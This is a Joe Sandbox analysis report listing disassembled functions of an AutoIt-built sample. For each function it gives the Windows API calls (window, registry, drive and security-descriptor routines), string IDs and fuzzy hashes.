                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                                                                        • Opcode ID: 2a975495b10d9abcc647e5d757c07019565db8552c8cabbfbf7a75f26311ad86
                                                                                                                                                                        • Instruction ID: 122e711cc2378dd5c004a2697ed0b28ebe43323731c07fb4bc235c5a91d9d3d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a975495b10d9abcc647e5d757c07019565db8552c8cabbfbf7a75f26311ad86
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A61E530A78925DBE725DF24D9929B8B3A1FF04350B744017E426AB391C7F1DD61CB91
                                                                                                                                                                        Function 00262521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002625F8
                                                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00262600
                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0026262B
                                                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00262633
                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00262658
                                                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00262675
                                                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00262685
                                                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002626B8
                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002626CC
                                                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 002626EA
                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00262706
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00262711
                                                                                                                                                                          • Part of subcall function 002619CD: GetCursorPos.USER32(?), ref: 002619E1
                                                                                                                                                                          • Part of subcall function 002619CD: ScreenToClient.USER32(00000000,?), ref: 002619FE
                                                                                                                                                                          • Part of subcall function 002619CD: GetAsyncKeyState.USER32(00000001), ref: 00261A23
                                                                                                                                                                          • Part of subcall function 002619CD: GetAsyncKeyState.USER32(00000002), ref: 00261A3D
                                                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,0026199C), ref: 00262738
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                        • String ID: <)3$<)3$AutoIt v3 GUI$(3$(3$(3
                                                                                                                                                                        • API String ID: 1458621304-398768274
                                                                                                                                                                        • Opcode ID: 7646b305acaeb39ade9d0d2a5ea293fac2e1ad56593d7d2decbdc7e938c6d80a
                                                                                                                                                                        • Instruction ID: 991680e11cc7546804661fcc9050279284e296389f05a93c629193f83ec34ae2
                                                                                                                                                                        • Opcode Fuzzy Hash: 7646b305acaeb39ade9d0d2a5ea293fac2e1ad56593d7d2decbdc7e938c6d80a
                                                                                                                                                                        • Instruction Fuzzy Hash: 41B16C71A1020ADFDB15DFA8DC89BAE7BB5FB48314F104129FA15EB290CB74A960CF51
                                                                                                                                                                        Function 002F1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 002F1BC4
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002F1BD9
                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 002F1BE0
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 002F1C35
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 002F1C55
                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002F1C89
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002F1CA7
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002F1CB9
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 002F1CCE
                                                                                                                                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 002F1CE1
                                                                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 002F1D3D
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002F1D58
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002F1D6C
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 002F1D84
                                                                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 002F1DAA
                                                                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 002F1DC4
                                                                                                                                                                        • CopyRect.USER32(?,?), ref: 002F1DDB
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 002F1E46
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                                                        • Opcode ID: 34e64269811200f3db6945c1b94805b266a7d05f0cb5ee1a5ef4c73b47d8684a
                                                                                                                                                                        • Instruction ID: 32e4155ce979d8df9da16ba4c382342d6a3766abd6660f3942ee149815389462
                                                                                                                                                                        • Opcode Fuzzy Hash: 34e64269811200f3db6945c1b94805b266a7d05f0cb5ee1a5ef4c73b47d8684a
                                                                                                                                                                        • Instruction Fuzzy Hash: DCB18A71614301EFD704DF64D888B6AFBE5EF84350F408929FA999B2A1C731E864CB92
                                                                                                                                                                        Function 002F0CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 002F0D81
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F0DBB
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F0E25
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F0E8D
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F0F11
                                                                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002F0F61
                                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002F0FA0
                                                                                                                                                                          • Part of subcall function 0027FD52: _wcslen.LIBCMT ref: 0027FD5D
                                                                                                                                                                          • Part of subcall function 002C2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002C2BA5
                                                                                                                                                                          • Part of subcall function 002C2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002C2BD7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                        • API String ID: 1103490817-719923060
                                                                                                                                                                        • Opcode ID: 1d69b66a5e800804f3f261ffebdfc35d501ffa09f51b19e5ff2bb6124146e7ac
                                                                                                                                                                        • Instruction ID: cbf8980f2543e9349537c5055a0812d208daa83e16e2d73573c2ffa430084fab
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d69b66a5e800804f3f261ffebdfc35d501ffa09f51b19e5ff2bb6124146e7ac
                                                                                                                                                                        • Instruction Fuzzy Hash: D2E1D0312282168FC714EF24C59093AF3E5FF88394B54492DF9969B3A2DB30ED65CB41
                                                                                                                                                                        Function 002C16D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C1A60
                                                                                                                                                                          • Part of subcall function 002C1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A6C
                                                                                                                                                                          • Part of subcall function 002C1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A7B
                                                                                                                                                                          • Part of subcall function 002C1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002C14E7,?,?,?), ref: 002C1A82
                                                                                                                                                                          • Part of subcall function 002C1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C1A99
                                                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002C1741
                                                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002C1775
                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 002C178C
                                                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 002C17C6
                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002C17E2
                                                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 002C17F9
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002C1801
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 002C1808
                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002C1829
                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 002C1830
                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002C185F
                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002C1881
                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002C1893
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C18BA
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C18C1
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C18CA
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C18D1
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002C18DA
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C18E1
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 002C18ED
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 002C18F4
                                                                                                                                                                          • Part of subcall function 002C1ADF: GetProcessHeap.KERNEL32(00000008,002C14FD,?,00000000,?,002C14FD,?), ref: 002C1AED
                                                                                                                                                                          • Part of subcall function 002C1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002C14FD,?), ref: 002C1AF4
                                                                                                                                                                          • Part of subcall function 002C1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002C14FD,?), ref: 002C1B03
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                                                        • Opcode ID: cc4cc4ebd3f55aea9c89ea46940c772cdf31ccce36cf913463e74f5d5c55e06c
                                                                                                                                                                        • Instruction ID: 3b8b8042b76b5bde87d020f4fd69bc03c91d56865388d1aa06ea29cb02f5a2d7
                                                                                                                                                                        • Opcode Fuzzy Hash: cc4cc4ebd3f55aea9c89ea46940c772cdf31ccce36cf913463e74f5d5c55e06c
                                                                                                                                                                        • Instruction Fuzzy Hash: 39717E71D1420AAFEF10DFA4EC49FAEBBB9BF05350F144229F914A6191DB319925CB60
                                                                                                                                                                        Function 002ECE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002ECF1D
                                                                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,002FDCD0,00000000,?,00000000,?,?), ref: 002ECFA4
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 002ED004
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002ED054
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002ED0CF
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 002ED112
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 002ED221
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 002ED2AD
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 002ED2E1
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 002ED2EE
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 002ED3C0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                        • API String ID: 9721498-966354055
                                                                                                                                                                        • Opcode ID: f3ec2adfa556d2e801977b4fecdc85d96d666de85f37e6ebff7e60f19d49b0d2
                                                                                                                                                                        • Instruction ID: 7534737adef7a3d12903085f777155134dc505d82ba9bd3c5ec34cc9a0d89cb3
                                                                                                                                                                        • Opcode Fuzzy Hash: f3ec2adfa556d2e801977b4fecdc85d96d666de85f37e6ebff7e60f19d49b0d2
                                                                                                                                                                        • Instruction Fuzzy Hash: 1B1299756242019FDB14EF15C881A2AB7E5FF88714F14889DF99A9B3A2CB31EC51CF81
                                                                                                                                                                        Function 002F13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 002F1462
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F149D
                                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002F14F0
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F1526
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F15A2
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F161D
                                                                                                                                                                          • Part of subcall function 0027FD52: _wcslen.LIBCMT ref: 0027FD5D
                                                                                                                                                                          • Part of subcall function 002C3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002C3547
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                        • API String ID: 1103490817-4258414348
                                                                                                                                                                        • Opcode ID: 6fc4b700cfdd7932eee2c6feaaaaa32024ce5171c52ab378b5cef8714d0103ba
                                                                                                                                                                        • Instruction ID: 6a7990e0d48b6063cf612d85562429fad73ac6121bf64d3f7846be9e36f955a8
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fc4b700cfdd7932eee2c6feaaaaa32024ce5171c52ab378b5cef8714d0103ba
                                                                                                                                                                        • Instruction Fuzzy Hash: CDE1CD35628206CFC714EF24C55082AF7E6BF94394B84896CF9969B3A1DB30ED65CF81
                                                                                                                                                                        Function 002ED3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                                                                        • Opcode ID: 7b5f06b0a7438a85ec07e317f0fcbd6c85c462e368cba3c30bb80ca82c95f4ef
                                                                                                                                                                        • Instruction ID: e2f0582a7df8cf970578145074af5f52d14571907a3845f4c9ddbb8ef15089cb
                                                                                                                                                                        • Opcode Fuzzy Hash: 7b5f06b0a7438a85ec07e317f0fcbd6c85c462e368cba3c30bb80ca82c95f4ef
                                                                                                                                                                        • Instruction Fuzzy Hash: F97117366B01A78BCB10AF3ED9506BB33A5AF70354BE10125F8569B294EA31DD74C790
                                                                                                                                                                        Function 002F8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F8DB5
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F8DC9
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F8DEC
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F8E0F
                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002F8E4D
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002F6691), ref: 002F8EA9
                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002F8EE2
                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002F8F25
                                                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002F8F5C
                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 002F8F68
                                                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002F8F78
                                                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,002F6691), ref: 002F8F87
                                                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002F8FA4
                                                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002F8FB0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                                                        • API String ID: 799131459-1154884017
                                                                                                                                                                        • Opcode ID: 6580fb1098e41791ec89efdba1d62c4702c9424584f6993cc5c0c73643efe031
                                                                                                                                                                        • Instruction ID: f0dd5f4a715223fa586236b18cc992c258a4946640fb8687127d428dbd1f7859
                                                                                                                                                                        • Opcode Fuzzy Hash: 6580fb1098e41791ec89efdba1d62c4702c9424584f6993cc5c0c73643efe031
                                                                                                                                                                        • Instruction Fuzzy Hash: 5761F47152021ABFEB14DF64DC45BBEF7A8BF08B60F104226F915D61D1DB74A9A0CBA0
                                                                                                                                                                        Function 002D48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 002D493D
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D4948
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D499F
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002D49DD
                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 002D4A1B
                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002D4A63
                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002D4A9E
                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002D4ACC
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
